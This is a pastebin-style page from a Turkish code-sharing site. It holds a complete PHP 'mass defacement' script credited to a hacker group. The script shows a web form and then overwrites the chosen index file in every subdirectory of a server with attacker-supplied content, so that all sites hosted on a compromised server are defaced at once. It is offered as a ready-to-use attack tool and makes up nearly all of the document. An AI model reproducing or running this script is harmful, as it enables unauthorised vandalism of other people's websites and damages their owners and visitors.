Uyarı!

Sistemimizden daha iyi faydalanabilmek için Üye Olmanız yada Giriş Yapmanız gerekmektedir. yada Şifremi Unuttum tıkla

Pastebin | Pastebin Ekle

Mass deface php

MecTruy tarafından ... 13.03.2016 - 22:43
|
			<?php
 
/*
 
Mass Defacement Script By ~xAn0nPH
 
Contact => http://facebook.com/AnonTeamX.gov
 
*/
 
echo "<title>Mass Defacer - By xAn0nPH</title>";
echo "<link href='http://fonts.googleapis.com/css?family=Electrolize' rel='stylesheet' type='text/css'>";
echo "<body bgcolor='black'><font color='white'><font face='Electrolize'>";
echo "<center><form method='POST'>";
echo "Base Dir : <input type='text' name='base_dir' size='50' value='".getcwd ()."'><br><br>";
echo "File Name : <input type='text' name='file_name' value='index.php'><br><br>";
echo "Your Index : <br><textarea style='width: 685px; height: 330px;' name='index'>//Put Your Index Here</textarea><br>";
echo "<input type='submit' value='Start'></form></center>";
 
if (isset ($_POST['base_dir']))
{
    if (!file_exists ($_POST['base_dir']))
        die ($_POST['base_dir']." Not Found !<br>");
 
    if (!is_dir ($_POST['base_dir']))
        die ($_POST['base_dir']." Is Not A Directory !<br>");
 
    @chdir ($_POST['base_dir']) or die ("Cannot Open Directory");
 
    $files = @scandir ($_POST['base_dir']) or die ("oohhh shet<br>");
 
    foreach ($files as $file):
        if ($file != "." && $file != ".." && @filetype ($file) == "dir")
        {
            $index = getcwd ()."/".$file."/".$_POST['file_name'];
            if (file_put_contents ($index, $_POST['index']))
                echo "$index&nbsp&nbsp&nbsp&nbsp<span style='color: green'>OK</span><br>";
        }
    endforeach;
}
 
?>